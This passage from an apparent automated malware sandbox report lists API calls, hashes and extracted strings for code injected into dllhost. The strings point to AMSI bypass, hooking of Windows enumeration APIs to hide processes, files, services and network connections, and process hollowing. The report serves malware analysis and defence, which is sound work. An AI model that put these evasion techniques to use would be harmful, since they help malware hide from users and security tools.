                              • Instruction Fuzzy Hash: BD31E822610F6493DB708B649E88268A654F765BB2F65034BFB6A873F0CB34D4E1C704
                              APIs
                              Memory Dump Source
                              • Source File: 00000026.00000003.2596028752.0000025DC1A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025DC1A90000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_3_25dc1a90000_dllhost.jbxd
                              Similarity
                              • API ID: LibraryLoad
                              • String ID:
                              • API String ID: 1029625771-0
                              • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                              • Instruction ID: 7d4c6d6694181fca60a94fbb4f08e5cc5269284d95e537889e42ce9c480c530d
                              • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                              • Instruction Fuzzy Hash: 1391F372701B6087DF64CF69D80876D73B1FB64B96F5881229E4987B98DA38D893C708

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 375 140002d38-140002d3c call 140002d4c 377 140002d41-140002d43 ExitProcess 375->377
                              APIs
                                • Part of subcall function 0000000140002D4C: OpenMutexW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D6C
                                • Part of subcall function 0000000140002D4C: Sleep.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D7C
                                • Part of subcall function 0000000140002D4C: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D87
                                • Part of subcall function 0000000140002D4C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002DA5
                                • Part of subcall function 0000000140002D4C: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002DB5
                                • Part of subcall function 0000000140002D4C: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002DCF
                                • Part of subcall function 0000000140002D4C: LookupPrivilegeValueW.ADVAPI32 ref: 0000000140002DE6
                                • Part of subcall function 0000000140002D4C: AdjustTokenPrivileges.KERNELBASE ref: 0000000140002E20
                                • Part of subcall function 0000000140002D4C: GetLastError.KERNEL32 ref: 0000000140002E2A
                                • Part of subcall function 0000000140002D4C: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E33
                                • Part of subcall function 0000000140002D4C: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E5C
                                • Part of subcall function 0000000140002D4C: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E8C
                                • Part of subcall function 0000000140002D4C: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EBC
                                • Part of subcall function 0000000140002D4C: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002ED0
                                • Part of subcall function 0000000140002D4C: HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EDE
                                • Part of subcall function 0000000140002D4C: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EF1
                              • ExitProcess.KERNEL32 ref: 0000000140002D43
                              Memory Dump Source
                              • Source File: 00000026.00000002.2962940378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                              • Associated: 00000026.00000002.2961669704.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2964269024.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2965601829.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_140000000_dllhost.jbxd
                              Similarity
                              • API ID: Process$Open$HeapValue$CloseHandleQueryToken$AdjustAllocCurrentErrorExitLastLookupMutexPrivilegePrivilegesSleep
                              • String ID:
                              • API String ID: 3805535264-0
                              • Opcode ID: 79b4bc089e26725b3875790e3276540c07806726462858758fa47b4ded48d988
                              • Instruction ID: 466ff6e6ce30b805044d1f2dc35dca8baccd3c328fc793c3ea1e6e53ebee4899
                              • Opcode Fuzzy Hash: 79b4bc089e26725b3875790e3276540c07806726462858758fa47b4ded48d988
                              • Instruction Fuzzy Hash: 15A002F0F2258083EB0AB7B7B85A3DD25B1ABAC781F100416B2024B2B3DE3C48954759
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000026.00000002.2962940378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                              • Associated: 00000026.00000002.2961669704.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2964269024.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2965601829.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_140000000_dllhost.jbxd
                              Similarity
                              • API ID: Process$Virtual$MemoryWrite$Thread$AllocContextProtect$Wow64$AddressCreateHandleModuleOpenProcResumeTerminate
                              • String ID: @$NtUnmapViewOfSection$RtlGetVersion$h
                              • API String ID: 1036100660-1371749706
                              • Opcode ID: fd1195e2308bccc300b2ff8f21b2c4cfd69eb2883e391b150e12868519e03b4e
                              • Instruction ID: 2cc4599025b35cf826ffc418a6ccceb484f0f008c335a408c33283198f0c2c0b
                              • Opcode Fuzzy Hash: fd1195e2308bccc300b2ff8f21b2c4cfd69eb2883e391b150e12868519e03b4e
                              • Instruction Fuzzy Hash: DAD15DB6705A8187EB65CF63F84479AB7A0F788BC4F004025EB8A47BA4DF78D595CB04
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000026.00000002.2962940378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                              • Associated: 00000026.00000002.2961669704.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2964269024.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2965601829.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_140000000_dllhost.jbxd
                              Similarity
                              • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                              • String ID: d
                              • API String ID: 2005889112-2564639436
                              • Opcode ID: 52c6d37a2af4a1d6a0e24c1d193143f06bb7b356f12ba86b493c37bc12672881
                              • Instruction ID: 9172d928bd221ff1096d4d6b158f49becdf828e9a984a0b33df103b3ad9988b4
                              • Opcode Fuzzy Hash: 52c6d37a2af4a1d6a0e24c1d193143f06bb7b356f12ba86b493c37bc12672881
                              • Instruction Fuzzy Hash: 765138B2604B8086EB16DF62F4483AA77A1F79CBD9F444124EB4A07B78DF38C555C710
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true
                              • Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd
                              Similarity
                              • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                              • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                              • API String ID: 2119608203-3850299575
                              • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                              • Instruction ID: f8e609f62974e7918783a99788bdf0ad2f2b3bf56514d942fb2f1a8205c14132
                              • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                              • Instruction Fuzzy Hash: F6B18E22210FA086EF74DFA5D9287A9A3A5FB64B87F409017EE0993794DE36CC42C744
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true
                              • Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd
                              Similarity
                              • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                              • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                              • API String ID: 2119608203-3850299575
                              • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                              • Instruction ID: 4fdab0edebb16473f97836fbf6e65ccfbe938ce41d716432743d95a74e8e48e4
                              • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                              • Instruction Fuzzy Hash: 07B17162210EA082EB758FA5DE08799E3A4FB64B87F44A017FE5993795DF35DC80C348
                              APIs
                              Memory Dump Source
                              • Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true
                              • Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd
                              Similarity
                              • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                              • String ID:
                              • API String ID: 3140674995-0
                              • Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                              • Instruction ID: eab925b8db7be042323af02dabb2e17104d139f60eebe8b079ffa808d64cfcd9
                              • Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                              • Instruction Fuzzy Hash: 6E317772201F908AEB74DFA0E8543EE7360F7A470AF44402ADA4E87B98DF78C249C714
                              APIs
                              Memory Dump Source
                              • Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true
                              • Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd
                              Similarity
                              • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                              • String ID:
                              • API String ID: 3140674995-0
                              • Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                              • Instruction ID: 83cbbca286ca62bde8096ab7b6b9cf10f8221cc2ed5c07a395f6cce9025682e1
                              • Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                              • Instruction Fuzzy Hash: 6F314976205F9086EB708FA0E8943EDB360F794746F44402AEB4E87B98DF38C548C718
                              APIs
                              Memory Dump Source
                              • Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true
                              • Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd
                              Similarity
                              • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                              • String ID:
                              • API String ID: 1239891234-0
                              • Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                              • Instruction ID: 74c50a65dfb7096de3d7d2378d1de0dcaed5e48340783c342c8781aafb939fc3
                              • Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                              • Instruction Fuzzy Hash: 43418E36214F9086EB70DF64EC5839E73A4F798766F500126EA8D87B99DF38C15ACB04
                              APIs
                              Memory Dump Source
                              • Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true
                              • Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd
                              Similarity
                              • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                              • String ID:
                              • API String ID: 1239891234-0
                              • Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                              • Instruction ID: a0eb815f1645407df5eaf6ef232f9ad91eca7a63f57af4064715022487a6fd21
                              • Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                              • Instruction Fuzzy Hash: B3417C36214F9086EB60CF64E84439EB3A4F798756F500216FB9D87B98DF38C195CB08
                              APIs
                              Memory Dump Source
                              • Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true
                              • Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd
                              Similarity
                              • API ID: Find$CloseFile$FirstNext
                              • String ID:
                              • API String ID: 1164774033-0
                              • Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                              • Instruction ID: 415b27e767e8cb02b2fc5937833541e7161f71f4f48a938405091388ba5c12af
                              • Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                              • Instruction Fuzzy Hash: 67A11622704FB049FF31DBB5DCA83AD6BA1A7A1797F044117DA48AB799DA35C043C748
                              APIs
                              Memory Dump Source
                              • Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true
                              • Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd
                              Similarity
                              • API ID: Find$CloseFile$FirstNext
                              • String ID:
                              • API String ID: 1164774033-0
                              • Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                              • Instruction ID: 60636663b88ace548b3dc5ff08e8c71e19d3032f16e37f1615a4d3afeeb9f41b
                              • Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                              • Instruction Fuzzy Hash: 9BA12A22714EA049FB30DBB5EE483BDABA0FB51797F144116FE59A7A95DA34C4C1C308
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true
                              • Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd
                              Similarity
                              • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                              • String ID: SOFTWARE\$rbx-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                              • API String ID: 2135414181-3414887735
                              • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                              • Instruction ID: 2301f58260b5f50a0bfdd5748d58a17c8cee787488d04f2ca4aedc0eb915ae30
                              • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                              • Instruction Fuzzy Hash: 26710C36310F60C5EB20EFA5EC6869923B4FBA5B9BF405122DD4E97768DE35C446C344
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true
                              • Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd
                              Similarity
                              • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                              • String ID: SOFTWARE\$rbx-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                              • API String ID: 2135414181-3414887735
                              • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                              • Instruction ID: 800ed405e8ef8e60c1664eedeb0737d88bb794ad1cd59c5aeadee18ef5627814
                              • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                              • Instruction Fuzzy Hash: 53712B26310E60C5EB30DFA1ED58A98A3A4FBA5B8BF401112FE4D87B28DE34C494C348
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true
                              • Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd
                              Similarity
                              • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
                              • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                              • API String ID: 1735320900-4225371247
                              • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                              • Instruction ID: 9857d0208ba78696633db9295b126366081488b252f9a7802abd2586bd043610
                              • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                              • Instruction Fuzzy Hash: AD517DA0110F7AA5EB20EBE8EC6C7E42361BBB1747F804517D409D3369DE79826BC348
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true
                              • Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd
                              Similarity
                              • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
                              • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                              • API String ID: 1735320900-4225371247
                              • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                              • Instruction ID: 4598a3b18a1ec82ad7ad8bd4f2e8a819fc60e642f4438dcd7e8d5b934ff5531d
                              • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                              • Instruction Fuzzy Hash: 7551A7A0610E6AA5EB20DFE4EE4DBD4A320BB71397F814513F40983275DE78C29AC34D
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true
                              • Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd
                              Similarity
                              • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                              • String ID: d
                              • API String ID: 2005889112-2564639436
                              • Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                              • Instruction ID: ebc526c350d9f76c70a513f847cd1794edf41d13c8705814d43992ffaeeb6a91
                              • Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                              • Instruction Fuzzy Hash: C6517C72200F94DAEB24EFA2E95839AB7A1F799F9AF444125DE4987718DF3CC046C704
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true
                              • Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd
                              Similarity
                              • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                              • String ID: d
                              • API String ID: 2005889112-2564639436
                              • Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                              • Instruction ID: 32303dcd766fb764d496be8c80a3e53bb21284a0d6ea89a78d25052e09c12752
                              • Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                              • Instruction Fuzzy Hash: 77515C72200B94D6E720CFA2E94839AB7A1F799F9AF448126EF4987758DF3CC059C704
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true
                              • Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File
